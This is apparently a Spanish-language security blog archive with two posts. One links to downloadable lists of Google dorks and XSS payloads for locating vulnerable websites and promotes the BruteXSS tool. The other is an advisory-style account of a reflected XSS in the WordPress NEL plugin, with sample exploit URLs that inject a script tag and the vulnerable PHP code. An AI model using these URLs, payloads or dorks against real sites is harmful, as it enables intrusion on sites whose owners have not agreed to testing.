Tag Archive XSS

ByDrok3r

Google Dorks SQL Injection & XSS Payload | Encontrar vulnerabilidades en aplicaciones web

En este post, les comparto una recopilación de más de 100 dorks, para encontrar paginas vulnerables ya sea a SQL INJECTION ó XSS. En cuanto a dar con las vulnerabilidades XSS de igual manera comparto, una lista, la cual es un recopilatorio de más de 100 payloads, que podemos utilizar para dar con sitios vulnerables a XSS.

Google Dorks – SQL INJECTION

Puedes utilizar los GoogleDorks con el fin de encontrar paginas vulnerables a SQL INJECTION.
Descargar archivo .txt: [ SQL INJECTION – GoogleDorks.txt ]
Te recomiendo leer: [ Google Hacking ]

XSS Payloads

Esta lista de payloads, nos puede ayudar a encontrar paginas vulnerables a XSS, donde podremos hacer mas que un simple alert, en JavaScript. Podemos usar herramientas de fuerza fruta, que nos ayuden a encontrar dicha vulnerabilidad en una pagina web.
Puedes usar la herramienta BruteXSS, la cual te permite encontrar vulnerabilidades XSS por medio de fuerza bruta a una aplicacion web.

Sitio web con una vulnerabilidad de XSS almacenada

PasteBin: [ XSS Payloads ]
Descargar archivo .txt: [ Cross Site Scripting_Payloads.txt ]
Te recomiendo leer: [ Cross Site Scripting – (XSS) ]
Te recomiendo leer: [ BURLAR FILTROS | XSS ]
Descarga BruteXSS: [ BruteXSS ]
ByDrok3r

WordPress NEL (No External Links) Plugin | Vulnerable a XSS

WordPress NEL (No External Links) Plugin | Vulnerable a XSS

 

Fue reportada una vulnerabilidad en el plugin NEL (No External Links) de WordPress. Este plugin esta diseñado para los especialistas quienes venden en sus sitio web, el cual entre sus funciones tiene:

  • Estadísticas de clics salientes
  •  Enmascaramiento FullLink
  • Re-direccionamiento personalizado
  • Codificación en base64

Entre muchas otras. Durante un análisis de seguridad con ThunderScan por parte de DefenseCode se ha descubierto que el plugin para WordPress es vulnerable al XSS en su versión 3.5.17 e inferiores.

El proveedor del plugin resolvió los problemas de seguridad, sin embargo existen muchos sitios que aun no han actualizado, esto los pone en riesgo. La vulnerabilidad se encuentra presente en la version 3.5.17 e inferiores, actualmente el plugin esta en su versión 3.5.19.

XSS EJEMPLO:

Function:     echo
  Variable:     $_REQUEST['date1'], $_REQUEST['date2']
  Sample URL:  
http://Drok3r_web.com/wp-admin/options-general.php?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date1="><script>alert(1)</script>
  Sample URL:  
http://Drok3r_web.com/wp-admin/options-general.php?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date2="><script>alert(1)</script>
  File:         wp-noexternallinks\wp-noexternallinks-options.php
    ---------
    125    $date1 = $_REQUEST['date1'];
    ...
    129    $date2 = $_REQUEST['date2'];
    ...
    134    <input type="text" name="date1" value="<?php echo $date1;
?>"> <?php _e('to', 'wp-noexternallinks'); ?>
    135    <input type="text" name="date2" value="<?php echo $date2;
?>"><input type="submit"
    ---------